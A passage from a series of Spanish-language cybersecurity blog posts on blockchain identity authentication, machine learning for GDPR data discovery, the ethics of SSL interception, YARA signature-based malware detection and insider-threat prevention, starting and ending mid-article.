tomarle años, pero para una red de computadoras puede tomar tan sólo unos minutos. Las pruebas de trabajo que están vinculadas a los datos de cada bloque son necesarias para que los bloques sean aceptados. La dificultad de este trabajo se ajusta para limitar la velocidad a la que nuevos bloques pueden ser generados por la red a una media de uno cada 10 minutos. Así, la cadena puede continuamente agregarse y las transacciones se procesan de manera oportuna mientras se protegen los datos de la manipulación indebida, por los que la naturaleza de este problema hace matemáticamente imposible que alguien cambie la cadena de bloqueo. > Cambiar un bloque (que sólo puede hacerse haciendo un nuevo bloque que contenga el mismo predecesor) requiere regenerar a todos los sucesores y rehacer el trabajo que contienen". Esto se podría hacer teóricamente con suficiente tiempo, pero el libro público mencionado anteriormente es elegido por consenso, donde la red de usuarios está de acuerdo en que la cadena bloqueada más larga sea la cadena reconocida. Esto constituye el primer pilar de la cadena de bloques. Al acordar la cadena de bloques más larga, la única forma de que un usuario altere la cadena con éxito sería alterar un bloque y luego generar bloques de transacción subsiguientes para crear una nueva cadena más larga. Sin embargo, el uso de una prueba de problema de trabajo lo hace matemáticamente imposible debido a que la red de usuarios agregará bloques a un ritmo mucho más rápido que a la que cualquier persona sola podría agregar bloques. Así, la seguridad es confiable, lo que significa que la seguridad radica en evitar que las partes maliciosas hagan daño por naturaleza del protocolo, sin tener que autenticar una transacción. Por último, el libro mayor se distribuye, lo que significa que cada usuario almacena el libro mayor actual, evitando que alguien altere un único punto de verdad. En la criptografía tradicional, un único punto de verdad podría ser una autoridad de certificación, sin embargo, si esa autoridad de certificación iba a ser violada, un atacante malicioso podría reemplazar las claves almacenadas con sus propias claves. Al distribuir el libro mayor, un atacante tendría que violar cada máquina miembro y reemplazar la cadena de bloque por la suya propia haciendo que sea funcionalmente imposible para un atacante alterar la cadena. ## Blockchain para la autenticación y verificación de nuestra identidad [Imagen: Blockchain Identity] Nuevas empresas han comenzado a aprovechar el potencial de la cadena de bloques, desarrollando una variedad de servicios utilizando la tecnología. El centro de la autenticación de bloque de bloques sería un ID de bloque de bloques. Este ID es esencialmente un bloque de datos en la cadena que puede ser verificado por cualquier tercero y puede mostrar la información necesaria, como la fecha de nacimiento. El secreto de esta verificación es el ECDSA (algoritmo de firma digital de curva elíptica). Cuando se agrega un ID a blockchain, un servicio de emisión de identificación enlaza una clave pública de forma predeterminada y luego transfiere la propiedad de la clave privada al usuario. Esto permite al usuario, y sólo al usuario, firmar una firma que se puede verificar contra la clave pública almacenada en la cadena de bloques. Esta identificación de un usuario sería una fuente descentralizada de autenticación. Sería esencialmente un portal de inicio de sesión único al que cualquier aplicación puede acceder pero que no pertenece a ninguna entidad individual. Una aplicación protegida solo tendría que solicitar una firma digital y un ID de un usuario que solicita acceso. La aplicación podría verificar que la firma es válida y que el ID del usuario verifica quién dice ser. ## Problemas con la autenticación actual de segundo factor (2F) Hay algunas opciones actualmente utilizadas para la autenticación en dos factores. Estos tienen una adopción relativamente amplia, sin embargo, los métodos son anticuados y plantean otras amenazas de seguridad. Por ejemplo, uno de los métodos más comunes es enviar un código a través de SMS. Esto es genial, sin embargo, los mensajes SMS son notoriamente inseguros. Un posible atacante podría "ver" mensajes de cualquier número y leerlos, además de falsificar el remitente del mensaje. Esto tiene un gran problema porque si un atacante sabe que su cuenta usa mensajes de texto como un método de copia de seguridad de autenticación y su nombre, podría encontrar sus números de teléfono listados en línea y luego interceptar esos mensajes, obteniendo acceso a cualquier código enviado. [Imagen: Blockchain para la autenticación de Segundo Factor 2F] El otro problema con la autenticación actual de 2F es la naturaleza propietaria de los servicios. Métodos como Google Authenticator son seguros y fáciles de usar, sin embargo, Google, tiene acceso a todos tus códigos de segundo factor. Esta opción es mucho más segura pero retoma el problema de que sea una sola entidad propietaria de los datos de autenticación. Una error de Google podría hacer que se filtren todos sus códigos de autenticación. El enfoque descentralizado ofrecido por la cadena de bloques elimina este problema porque la cadena está 100% abierta al público y no se almacenan datos sensibles en la cadena de bloqueo. ## Aplicaciones del Blockchain Blockchain ID es una solución viable para poder resolver la verificación de que un usuario es quien dice que es. Pudiendo además, ampliar esta funcionalidad para realizar una variedad de transferencias seguras de datos en nombre de dicho individuo. Un servicio profundamente vinculado con la verificación de la identidad es el intercambio de información de identidad sin revelar información innecesaria como comente anteriormente. Además de compartir datos, un usuario también podría agregar datos a la cadena como prueba de una transacción, sin dar los datos originales de la transacción. Cualquiera de las partes podría verificar un documento en contra dicha entrada y demostrar que es válida, lo que permite una auditoría rápida y fiable de los datos compartidos. > Esta metodología se basaría en el principio de la firma de mensajes y el hash. Muchos servicios ya utilizan esta tecnología para verificar de forma segura los datos (como JSON Web Tokens) sin revelar los datos originales. ### Propuesta de autenticación con blockchain Un flujo de autenticación genérico que ha sido probado y utilizado por compañías como Blockstack se basa en un handshake centrado en bloques. Este handshake verifica tanto a la aplicación de autenticación como al usuario que es la otra parte con la que se están comunicando. En este ejemplo, la aplicación protegida es la aplicación que solicita la autenticación y el usuario es la entidad que intenta obtener acceso a la aplicación protegida. El primer paso de este flujo es similar al de cualquier inicio de sesión. Sin embargo, no se le pedirá al usuario que introduzca una contraseña. En su lugar, un usuario vería un formulario en la aplicación protegida para un nombre de usuario, a continuación, mostrará un código QR para la autenticación. El ejemplo de código QR sería más fácil de configurar y simplemente codificaría la solicitud de autenticación de la aplicación protegida. Esta solicitud de autenticación es el primer paso del handshake. El siguiente paso es verificar la solicitud y enviar una respuesta. Este paso contiene muchos pasos para garantizar la autenticación. En primer lugar, el usuario verificará que los datos de la solicitud son legítimos y que el sitio web protegido es el que espera. Esto podría hacerse utilizando criptografía de clave pública, y permitiría a la aplicación protegida firmar la solicitud, la cual luego se verifica públicamente a través de blockchain o una autoridad de certificación. Para soportar transiciones simples, sería razonable comenzar con un sistema de autoridad de certificado usado en TLS a HTTS. Sin embargo, esto podría transformarse en una autenticación de bloque de bloques completa mediante la creación de un ID de aplicación en la cadena blockchain que podría verificarse. Después de verificar esta solicitud, el usuario debería hacer clic en un botón que indicase el inicio de sesión. Esto crearía una respuesta, la firmaría y, a continuación, la enviaría de vuelta a una ruta especificada en la aplicación protegida. Esta solicitud se verificará mediante la utilización de la criptografía de clave pública en la aplicación protegida y registrará el usuario. El beneficio de utilizar la cadena blockchain es que está completamente descentralizada. Si no se desea utilizar una aplicación para facilitar este flujo, el usuario podría simplemente generar su propia firma con su clave pública y enviarla en un formulario que el sitio web verificará. Esto demuestra el verdadero beneficio de un sistema descentralizado, puesto que cualquiera puede acceder a los datos y el usuario tiene el control de su clave privada, y como usuario no se obliga a utilizar una API para facilitar esta solicitud, pudiendo dar tanta confianza como se este dispuesto a dar. ### Compartir sólo la información de identidad que deseas Un problema actual con la verificación de identidad es que se está obligado a dar más información de la que el sistema realmente necesita. El problema con esto, es que si la transacción se ve comprometida y alguien es capaz de interceptar los datos de alguna manera, tendrán bastante información para comenzar a forjar una identidad. Para resolver este problema, el flujo de autenticación anterior podría ampliarse para soportar este tipo de servicio. > Blockstack ha propuesto un formato sugerido para estas solicitudes Primero el protocolo definiría un conjunto de "permiso" o solicitud para un conjunto particular de datos. Este nivel de "permiso" sería definido para un caso de uso común. Por ejemplo, si el sistema desea recopilar información de la tarjeta de crédito, podría enviar una solicitud de "pago". Que el usuario podría ver y determinar si quieren revelar su información de tarjeta de crédito a este vendedor. Si confían en él, pueden firmar la solicitud y enviar un paquete de datos que contenga la información pertinente. Si su banco admite la autenticación blockchain, podrían simplemente enviar un paquete de pago firmado, que el sitio web podría luego reenviar al banco y completar la transacción. Evitando así que el usuario proporcione a la tienda información personal ( Es aquí donde esta la magia ). De lo contrario, el paquete de datos podría incluir información financiera, como el número de tarjeta de crédito, cvs ... Sin embargo, el sitio web con el fin de evitar el fraude, podría verificar que esta persona es realmente el propietario de los datos y que no se esta utilizando una tarjeta robada. Para hacer esto, el hash criptográfico podría ser verificar los datos, un principio aplicado por Tieron para lograr este efecto. El primer paquete sería el hash firmado por el usuario. Esto diría a la tienda que es realmente una persona quien envío los datos. A continuación, el sitio buscaría en blockchain una versión firmada y un hash de estos datos. Si los hashes coinciden con las firmas, el almacén sabrá que los datos están asociados con esa persona y que los datos no están alterados, dando una seguridad razonable de que la tarjeta es propiedad del individuo autenticado. Al aplicar los principios utilizados por Blockstack y Tierion, se podría establecer un sistema de autenticación y verificación de identidad completo, seguro y, sobre todo, distribuido. ## Conclusiones A pesar de que existen muchas aplicaciones posibles en blockchain, no debemos suponer que la cadena de bloques es una solución perfecta para estos problemas. Como con cualquier sistema, todavía hay inconvenientes e inseguridades, ya que ningún sistema es 100% seguro y por lo tanto, debemos considerarlo a la hora de adoptar esta tecnología. En el caso de la autenticación, el problema sigue siendo que se puede confiar en un tipo de autoridad de certificación, confiando en una tercera parte. Para asegurar que un ID es realmente la persona que dice ser, se requieren formas de verificación más seguras que simplemente usar los mensajes de los medios de comunicación sociales. Por lo tanto, al igual que el caso de las autoridades de certificación para el protocolo TLS, las personas tendrían que confiar en que estas autoridades están verificando adecuadamente estos documentos. Solucionándolo con un sistema basado en hash que podría ser utilizado para almacenar un registro del documento utilizado para que alguien pueda verificar que es parte de una identidad dada, sin embargo, la información de este documento puede ser sensible y por lo tanto el propietario no quiere cierta información esté disponible en la cadena de bloques. Esto introduce la cuestión actual de un tercero de confianza y temas como la seguridad. Aunque ECDSA es extremadamente seguro, y la criptografía de clave pública está más que probada, la gente está notoriamente insegura con los datos expuestos, especialmente en el caso de las personas que no entienden la tecnología que están utilizando ( que son la mayoría de las personas que lo utilizan ). Cuestiones como estas deben considerarse antes de crear un amplio sistema de identidades basado en blockchain, sin embargo, los posibles casos de uso y beneficios para la sociedad son innegables. A medida que la sociedad esta cada vez más centrada en la tecnología e internet, es necesaria una mejor identidad digital y las formas contemporáneas de autenticación e identificación se vuelven cada vez más inseguras e insuficientes para el mundo en el que vivimos. --- # Machine Learning para descubrir datos sensibles GDPR URL: https://ciberseguridad.blog/machine-learning-para-descubrir-datos-sensibles-gdpr/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2017-06-05 Actualizado: 2026-10-04 Tema: Compliance > LA GDPR está a la vuelta de la esquina y todavía, la gran mayoría de las empresas se están preparando para adoptarla, motivadas principalmente por la grandes sanciones derivadas de su incumplimiento. La GDPR sustituye a la Directiva 95/46/CE sobre protección de datos, siendo diseñada para armonizar las leyes de privacidad de datos en toda Europa, siendo el mayor cambio en la regulación de la privacidad de datos desde hace 20 años en Europa. Los elementos principales de la GDPR son un poco di LA GDPR está a la vuelta de la esquina y todavía, la gran mayoría de las empresas se están preparando para adoptarla, motivadas principalmente por la grandes sanciones derivadas de su incumplimiento. La GDPR sustituye a la Directiva 95/46/CE sobre protección de datos, siendo diseñada para armonizar las leyes de privacidad de datos en toda Europa, siendo el mayor cambio en la regulación de la privacidad de datos desde hace 20 años en Europa. Los elementos principales de la GDPR son un poco difíciles de entender, pero una cosa es clara, el descubrimiento de datos es obligatorio en cualquiera de los casos, pudiendo encontrar información personal o sensible en los repositorios de datos, la gran mayoría en base de datos, pero con la incursión de Big Data, también archivos. Por ello, el descubrimiento de datos podría empezar por tres áreas principales, intentando obtener el mejor resultado, a un menor esfuerzo : - Descubrimiento de columnas - Descubrimiento de datos - Descubrimiento de archivos El descubrimiento de columnas es fácil de entender, basado en palabras clave o frases específicas, encontramos nombres de columnas en bases de datos y lo combinamos con posibles datos confidenciales. > Donde empieza la diversión es en el descubrimiento de datos y el descubrimiento de archivos. Para ello, se puede utilizar una herramienta basada en Apache OpenNLP que es una biblioteca de basada en un kit de herramientas para el procesamiento de texto de lenguaje natural. A partir de todo ello se usa un modelo de aprendizaje machine learning (OpenNLP) preentrenados ( existen ejemplos públicos, en español algunos de ellos, disponibles aquí ) con el uso de técnicas como la tokenización, la segmentación de oraciones, la extracción de entidades con nombre y el análisis para entender si los datos son sensibles o no. Por ejemplo, si la columna se llama X-DATA pero tiene información personal como una dirección, el descubrimiento de columnas no ayudará. Por ello, debe explorarse una muestra de datos dentro de X-DATA y aplicar modelos preentrenados basados en OpenNLP para entender si esa muestra contiene algún tipo de dirección. En este ejemplo de modelos preentrenados y el uso de machine learning se han utilizado datos en Portugués e Inglés y la herramient produciendo columnas de probabilidad con dichos datos "sospechoso" ,probables de ser sensibles o lo que es lo mismo, factibles de verse afectados por la GDPR . [Imagen: Machine Learning GDPR] ## ¿Cómo se aplica la GDPR al Big Data? En marzo de 2017, la ICO publicó una actualización de su Informe del 2014 sobre grandes datos a la luz de la inminente aplicación de la GDPR. El informe actualizado de la ICO ha añadido un enfoque nuevo sobre la inteligencia artificial y el aprendizaje automático en la gestión de grandes datos proporcionando una guía práctica para el cumplimiento de la GDPR en el Big Data. El informe de la ICO considera que los tipos de datos personales utilizados para el análisis de grandes datos puede implicar el uso de «nuevos tipos de datos» para el análisis, tales como «datos observados», «datos derivados» y «datos inferidos». Siendo estos datos adicionales a los datos personales proporcionados conscientemente por el individuo. Los nuevos tipos de datos se recopilan a través de diversos sensores, cookies o se producen utilizando algoritmos de machine learning y métodos analíticos. El informe sugiere que la complejidad de los grandes análisis de datos no debe impedir que las empresas cumplan con las normas de protección de datos. Por ello, si se invoca el consentimiento o los intereses legítimos como fundamento jurídico para el tratamiento de los datos personales en el Big Data, deben cumplirse todas las condiciones pertinentes para dicho procesamiento establecidas en la GDPR. Es por esto que el ICO concluye que es improbable que el contrato sea una base válida para el procesamiento para fines de análisis de datos de gran tamaño, ya que será difícil demostrar que el nivel de procesamiento de los grandes datos analíticos sea "necesario" para el desempeño de un contrato. Dado que los grandes datos analíticos generalmente reutilizan los datos personales, el ICO sugiere que las empresas necesitarán obtener el consentimiento informado para cualquier uso secundario de los datos personales, cumpliendo este escenario también donde los datos personales se obtienen de otras organizaciones y no directamente de los individuos. La ICO acepta que los principios de minimización de datos y retención de estos podrían ser difíciles de cumplir, pero a pesar de ello, insiste en que las empresas que realizan Big Data deben definir el objetivo de dicho análisis desde el principio y garantizar que los datos personales que utilizan no son excesivos y son relevantes para el objetivo por el cual se entregaron o cedieron. Es por tal fin que las empresas deben velar por que se cumplan los requisitos sobre la retención de datos, tal y como se establece en el GDPR. La ICO ofrece seis recomendaciones clave para el cumplimiento de la GDPR en entornos de Big Data: - Anonimizar los datos personales, cuando los datos personales no sean necesarios para el análisis. - Ser transparentes sobre el uso de datos personales en el Big Data , proporcionando avisos de privacidad en las etapas apropiadas a lo largo de proyecto de obtención de datos. - Incorporar un proceso de evaluación del impacto de la privacidad en grandes proyectos de datos para ayudar a identificar los riesgos de privacidad. - Adoptar un enfoque de privacidad por diseño en el desarrollo y la aplicación del Big Data. - Desarrollar los principios éticos que ayuden a reforzar los principios clave de la protección de datos. - Implementar auditorías internas y externas de los algoritmos de machine learning para verificar si hay sesgo, discriminación y errores. ## Conclusión En la actualidad el Big Data es un foco de atención a nivel de la UE. El Parlamento de la UE aprobó el 14 de marzo de 2017 una resolución sobre Big Data que insta a los sectores público y privado a que adapten sus grandes prácticas de datos a las normas en materia de protección de datos, incluida la GDPR: Privacidad, protección de datos, no discriminación, seguridad y aplicación de la ley. La GDPR ya esta a la vuelta de la esquina, pero todavía hay muchas cuestiones por aclarar y poner sobre la mesa. Pero mientras tanto y para que no nos pille el toro, con todo lo que sabemos hasta ahora, empecemos a hacer un levantamiento de la situación, con herramientas como la que hemos visto al inicio del Post. Muchas empresas saben que tienen datos sensibles, pero la gran pregunta es ¿ Donde están los datos sensibles ? --- # Intercepción SSL , sacrificando la ética por la seguridad URL: https://ciberseguridad.blog/intercepcion-ssl-sacrificando-la-etica-por-la-seguridad/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2017-05-29 Actualizado: 2026-10-04 Tema: Operaciones de Seguridad > El mes pasado, el proveedor de Wifi, Gogo, fue descubierto interceptando sesiones web codificadas de YouTube y otros sitios de video con el fin de acelerar a los usuarios que usaban un alto ancho de banda. Mas tarde, se reveló que Lenovo estaba instalando adware en portátiles que interceptaban todas las solicitudes web codificadas para inyectar anuncios dirigidos en sitios protegidos por encriptación. Se ha escrito mucho acerca de la falta de ética de estas prácticas para la seguridad del consum El mes pasado, el proveedor de Wifi, Gogo, fue descubierto interceptando sesiones web codificadas de YouTube y otros sitios de video con el fin de acelerar a los usuarios que usaban un alto ancho de banda. Mas tarde, se reveló que Lenovo estaba instalando adware en portátiles que interceptaban todas las solicitudes web codificadas para inyectar anuncios dirigidos en sitios protegidos por encriptación. Se ha escrito mucho acerca de la falta de ética de estas prácticas para la seguridad del consumidor, mas allá de la ética, ¿Son legales estas practicas? La ley está lejos de ser capaz de resolver este dilema, la ausencia de una divulgación clara a los usuarios de que se esta rompiendo el cifrado web, probablemente viola, por lo menos, la ley de protección de datos. Dada la importancia del cifrado robusto para la privacidad de nuestras comunicaciones, incumbe a estos reguladores, el hacer cumplir estas regulaciones en compañías que socavan la información y la seguridad en Internet. ## ¿Como se supone que funciona el cifrado? En web, el cifrado se logra típicamente mediante el uso de los protocolos TLS (Transport Layer Security) y Secure Sockets Layer (SSL). Estas tecnologías permiten a los usuarios comunicarse con sitios web en forma privada sin vigilancia por parte de los proveedores de red, hackers maliciosos u otros intermediarios. En circunstancias normales, cuando un usuario se conecta a un sitio web a través de una conexión SSL cifrada (la dirección web comenzará con "https://" como empieza en nuestro blog de seguridad informática, el navegador del usuario inicia un "handshake" apretón de manos con el servidor del sitio web en el que las dos partes deciden con una variedad de parámetros la comunicación cifrada. Durante este proceso de handshake, el navegador del usuario primero solicita la clave de cifrado pública del sitio y, a continuación, comprueba si la autoridad de certificación confía en el sitio. Las autoridades de certificación son proveedores de terceros de confianza, como Symantec o Comodo , que certifican la identidad del operador de un sitio web y aseguran técnicamente al navegador del usuario que la clave pública del sitio es legítima. Usando la clave pública del sitio, el navegador del usuario envía una comunicación de vuelta al sitio de origen (que sólo puede descifrarse con la clave privada, poseída sólo por el operador del sitio) negociando los parámetros para iniciar una sesión cifrada simétricamente con el sitio, durante el cual las comunicaciones entre el sitio y el usuario están cifradas y no pueden ser vistas por intermediarios. [Imagen: Intercepcción SSL] Al configurar esta sesión cifrada, una red intermedia que transmite las peticiones del usuario y las comunicaciones subsiguientes no debería poder ver el contenido de dicha comunicación. Se podrán discernir algunos atributos básicos de la comunicación, incluyendo la dirección IP de destino y el dominio, pero no se podrá saber la URL real o el contenido de La página visitada. Los intermediarios que se sitúan entre el usuario y la web tienen la oportunidad de emitir sus propios certificados para varios sitios. Así, la red de Gogo se planteó como YouTube y presentó un falso certificado SSL autogenerado al navegador de los usuario, indicando erróneamente que operaba YouTube y otros dominios web de Google. (Técnicamente, la red de Gogo presentó un certificado falso para cualquier dominio * .google.com, abarcando mucho más que el simple sitio de YouTube de Google). Como resultado, Gogo pudo inspeccionar el tráfico a YouTube y determinar que se trataban de videos (Gogo bloquea los sitios de video debido a las restricciones de ancho de banda en los aviones). Pero peor aún, Lenovo permitió que su socio publicitario Superfish se incluyese como cualquier sitio web para insertar anuncios dirigidos en páginas web cifradas. Por lo tanto, los intermediarios tienen la oportunidad de aprovechar su posición privilegiada como intermediarios de la red para presentarse como un sitio web de destino con el fin de interceptar e inspeccionar las comunicaciones cifradas. En seguridad informática, esto se conoce comúnmente como un ataque de "man in the middle" que no es más que una entidad incluida entre otras dos partes que están tratando de comunicarse entre sí para interceptar, inspeccionar y potencialmente alterar las comunicaciones, y presentarse a cada parte como la otra parte. Como resultado, la intervención es capaz de ver las comunicaciones sin cifrar entre los dos de una manera que no podría haber sido si no se hubiesen emitido falsamente certificados para los distintos dominios. ## ¿Es legítima la intervención SSL? Hay un par de argumentos para explicar por qué este comportamiento puede considerarse una práctica empresarial "engañosa". A nivel técnico, estas tecnologías son capaces de interceptar SSL y engañar al navegador emitiendo certificados SSL. En lugar de pasar el tráfico cifrado hacia el destino apropiado, estas tecnologías promulgan el "ataque man-in-the-middle" previamente descrito, obteniendo acceso a la información potencialmente confidencial que debería ser mantenida entre el usuario y, por ejemplo, su Banco o su farmacia online. Aunque estas prácticas no engañan directamente al usuario final, efectivamente engañan el software del usuario que actúa como un "agente". No está establecido que esto este prohibido por las autoridades como una práctica engañosa, pero en el pasado, ciertos organismos se han mostrado reacios a perseguir casos de prácticas engañosas simplemente por engañar a un navegador. ## ¿Es ética la intervención SSL? En Estados Unidos, para ser "injusto" según la Sección 5 del consumidor, una práctica comercial debe cumplir principalmente con tres criterios: - Causar un daño significativo al consumidor - No ser razonablemente evitable por los consumidores - No compensarse con beneficios compensatorios a los mismos Si romper el cifrado expone a los consumidores a importantes vulnerabilidades de seguridad, es probable que hablemos de un caso grave de violación de injusticia al consumidor. Pero, que pasa si romper el cifrado expone o vulnera la información del consumidor o usuario. Es difícil ver que las vulnerabilidades de seguridad introducidas por la interceptación SSL son compensadas por cualquier beneficio de esta práctica. ## Conclusión Dada la importancia fundamental de la encriptación web, todo esto parece ser un área donde se va a levantar una gran y larga discursión sobre su legitimidad y la ética detrás de ella. Por mi parte, no apoyo la intercepción SSL más allá de aportar un beneficio mayor de seguridad, pero si trasladamos dicho uso al mundo empresarial, los beneficios son mucho mayores que los inconvenientes. En la mayoría de las organizaciones, estos dispositivos de "descifrado" SSL normalmente se despliegan en la ruta de salida del tráfico (Proxys de salida), son de baja latencia, permiten bloquear el tráfico que no se puede descifrar, incluyen listas de exclusiones (por ejemplo, bancos legítimos), y en los que se podrá bloquear descargas con firmas concretas, como vimos con la detección basada en firmas , y los más importante, tras un pequeño periodo, son autónomos al 90% , sin necesidad de manipulación humana, lo que ayuda a posicionarse ante dicho dilema ético. En resumen, si eres responsable de proteger los activos de tu organización, definitivamente debes considerar los pros y los contras de usar esta tecnología. Pero una vez hecho esto, podréis ver como los pros son mucho mas amplios que los contras --- # Reglas YARA y la detección de malware basado en firmas URL: https://ciberseguridad.blog/reglas-yara-y-la-deteccion-de-malware-basado-en-firmas/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2017-05-22 Actualizado: 2026-10-04 Tema: Operaciones de Seguridad > YARA es una herramienta diseñada para ayudar a los investigadores de malware a identificar y clasificar las muestras del mismo. Se ha llamado la navaja suiza del emparejamiento de los modelos de investigación de la seguridad. Es multiplataforma y se puede utilizar tanto desde su interfaz de línea de comandos como a través de sus propios scripts de Python. La herramienta permite realizar detección de malware basada en firmas, algo similar a lo que las soluciones antivirus hacen por nosotros. YARA es una herramienta diseñada para ayudar a los investigadores de malware a identificar y clasificar las muestras del mismo. Se ha llamado la navaja suiza del emparejamiento de los modelos de investigación de la seguridad. Es multiplataforma y se puede utilizar tanto desde su interfaz de línea de comandos como a través de sus propios scripts de Python. La herramienta permite realizar detección de malware basada en firmas, algo similar a lo que las soluciones antivirus hacen por nosotros. ## Como usamos las reglas YARA Para utilizar este método, necesitamos una regla y un archivo que queramos comprobar. Por ejemplo, para ejecutarlo desde la línea de comandos, utilizaríamos: [Imagen: Uso de Reglas Yara] Esto devolverá una salida si la regla dada coincide con el archivo proporcionado. Si no existe salida y no hemos utilizado la opción negate, significa que ninguna regla coincide. Podemos iniciarlo con un número de switches de configuración; Estos son los dos más importantes: -n : Imprimir sólo reglas no satisfechas (negar). -r: Recursivamente buscar en directorios. ## Reglas YARA Una regla es un conjunto de cadenas y alguna forma de lógica, escrita en expresiones booleanas. [Imagen: Reglas Yara] Hay soporte para tres tipos diferentes de cadenas: - Cadenas hexadecimales, que son útiles para definir bytes en crudo; - Cadenas de texto; - Expresiones regulares. Las condiciones son expresiones booleanas que se reconocerán a partir de lenguajes de programación regulares de alto nivel. Podemos trabajar en cualquiera de las cadenas dadas, pero también en variables especiales incorporadas, como el tamaño del archivo o en variables externas que se definen fuera de la regla, ademas de existir soporte para el uso de módulos externos, como Cuckoo, para ampliar las características que se pueden utilizar en las condiciones. Pero el gran beneficio de YARA viene cuando se le proporciona una gran cantidad de conjuntos de reglas, pudiendo escribir las nuestras propias u obtenerlas de otros proveedores. ## Escribiendo nuestras reglas en YARA Escribir nuestras propias reglas no es tan difícil si consideramos una serie de pautas: - Los criterios que utilizamos en la búsqueda deben ser necesariamente una parte del comportamiento del malware. - Los criterios de búsqueda deben ser suficientes para distinguir la familia de programas maliciosos ya probados de otras familias de programas maliciosos. - El criterio de búsqueda tiene que ser una parte común en diferentes muestras. Una vez analizado el malware y extraído los datos útiles y reconocibles del mismo, podemos transformar la información en cadenas o reglas YARA y combinarlas con algún tipo de lógica. ## Cadenas YARA externas Como YARA utiliza firmas similares a las soluciones de antivirus, tendría sentido reutilizar estas firmas como una base de datos de reglas. Con el uso del script clamav_to_yara.py , podemos convertir la base de datos de firmas ClamAV en nuestro propio conjunto de reglas. Otra fuente de reglas es el repositorio Github YaraRules. Este es un conjunto de reglas bajo la licencia GNU-GPLv2 mantenido por un gran grupo de expertos en seguridad, dividido por categorías y actualizado con frecuencia. O podemos añadir plataformas externas de intercambio de inteligencia de amenazas, como MISP y ThreatConnect , las cuales también admiten YARA, permitiendo crear reglas basadas en nuestra propia información de amenaza recopilada de terceros. ## General Cadenas Para automaticamente Con el uso del generador de reglas de Joe Sandbox, podemos crear firmas para Windows basadas en datos de comportamiento estático y dinámico. Debemos tener en cuenta que estamos aplicando las mismas reglas que cuando usamos cajas de seguridad de análisis de malware en línea. Por ello, considerar que estamos subiendo archivos a un servicio de la nube externo, teniendo especial cuidado con los archivos sensibles o los datos que contienen. ## Casos adicionales He mencionado que podemos convertir la base de datos ClamAV a un conjunto de reglas utilizable, pero esto también podemos hacerlo al revés. Supongamos que tenemos un conjunto de reglas ya creadas. Podríamos configurar ClamAV para ampliar su conjunto de funciones con las reglas proporcionadas y dar soporte a YARA . Esto permite hacer coincidir las reglas en archivos comprimidos o empaquetados. O por ejemplo, podríamos usar la API privada de VirusTotal donde tenemos la función de poder introducir nuestras propias reglas y hacer que se activen cuando se cargue una muestra coincidente. ## La protección basada en la firma no es suficiente Sólo basarnos en la protección basada en firmas ya no es suficiente. Los atacantes han desarrollado contramedidas que usan para evitar este método. Con el uso de varios servicios de encriptación, empaquetadores y polimorfismo, pueden generar fácilmente malware que es lo suficientemente diferente para que ya no coincida con las firmas existentes anteriores. Estos inconvenientes no hacen obsoleta la detección basada en firmas. La comunidad de seguridad es grande y productiva en el intercambio de nuevos indicadores de amenaza, por lo que este tipo de herramientas seguirá siendo un activo importante en el arsenal de seguridad. Por ello, aunque la detección basada en firmas con YARA tiene sus límites, es una forma fácil y bastante sencilla de detectar malware en nuestros entornos. No sería prudente confiar en un sistema basado en firmas como la única medida de protección contra amenazas , pero dado el uso directo, no sería buena idea perder esta herramienta. Malware nuevo, podría tener trazar de malware anterior, como hemos podido ver con el código de Lazarus y WannaCry. --- # Como prevenir los ataque insiders URL: https://ciberseguridad.blog/como-prevenir-los-ataque-insiders/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2017-05-02 Actualizado: 2026-09-29 Tema: Vulnerabilidades y Ataques Informaticos > Todo el mundo es consciente del peligro de amenazas internas en cuanto a seguridad se refiere. Varias veces al año escuchamos noticias sobre una nueva violación de datos causada por información privilegiada filtrada malintencionadamente. Uno de los ejemplo más recientes, podría ser la Autoridad de Salud del Estado de Washington (HCA) donde el 9 de febrero de 2016, los datos de más de 90000 pacientes fueron filtrados por un empleado. La mayoría de estos informes provienen de instituciones gubern Todo el mundo es consciente del peligro de amenazas internas en cuanto a seguridad se refiere. Varias veces al año escuchamos noticias sobre una nueva violación de datos causada por información privilegiada filtrada malintencionadamente. Uno de los ejemplo más recientes, podría ser la Autoridad de Salud del Estado de Washington (HCA) donde el 9 de febrero de 2016, los datos de más de 90000 pacientes fueron filtrados por un empleado. La mayoría de estos informes provienen de instituciones gubernamentales o públicas, sin embargo esto no significa que las empresas privadas no sean susceptibles de amenazas internas. De hecho, los ataques internos son algo que las empresas de todo el mundo experimentan todos los días, pero que la gran mayoría opta por no hacer público, ya que puede dañar la reputación y conducir a una pérdida de clientes e inversores. Un ataque interno en sí mismo es un término que abarca muchos tipos de acciones maliciosas, desde un robo de datos completamente intencional o fraude cometido con fines de lucro, hasta el sabotaje, espionaje industrial, incluso a errores no intencionados o inadvertidos . Teniendo estas acciones en común el hecho de que todos ellos están comprometidos por empleados con acceso legítimo al funcionamiento interno de la empresa. A menudo dichos empleados son gerentes, operadores de bases de datos, programadores o especialista, que trabajan con datos sensibles, infraestructura o configuraciones crítica de sistemas. Tratar eficazmente con esta variedad de amenazas dentro de la organización es un proceso complejo y difícil que requiere un compromiso y esfuerzo importante dentro de las empresas. Una gestión de amenazas internas adecuada dará algunos resultados, pero para prevenir y detectar verdaderamente las amenazas internas, es necesario un enfoque de gestión de empleados diseñada de una manera específica. Poner en practica todos los consejos y recomendaciones para lidiar con los insiders puede ser duro y lento. Esta es la razón por la cual las mejores prácticas las hemos juntado en seis grandes pasos con los que seremos capaces de prevenir eficazmente las amenazas de fugas de información privilegiada, poniendo las medidas necesarias para una detección eficiente y una pronta respuesta antes posibles ataques insiders que terminen en fuga de información privilegiada. ## Entender las amenazas insiders Con el fin de crear una seguridad realmente eficaz, primero debe comprender la naturaleza de una amenaza insider y los distintos tipos de ataques existen. Las amenazas internas de seguridad de la información provienen de personal interno que normalmente se definen como personas que tienen acceso legítimo a información restringida o confidencial o ha infraestructura crítica de la empresa. Hay tres grupos principales que se pueden clasificar como insiders: - Empleados - Son el primer grupo que nos viene a la mente, los empleados actuales tienen acceso inmediato y legítimo a todos o la gran mayoría de los datos sensibles. El mayor peligro entre los empleados de la empresa, se plantea con los usuarios con cuentas privilegiadas. Estos usuarios tienen un nivel más alto de acceso y usualmente disfrutan de un alto nivel de confianza en al compañía, poniéndolos en la mejor posición para cometer acciones maliciosas. - Terceros - las empresas modernas y mas concretamente las del sector tecnológico, suelen estar afiliadas con una amplia gama de diferentes personas y organizaciones. Subcontratas, proveedores de servicios y socios comerciales tienen acceso a la red 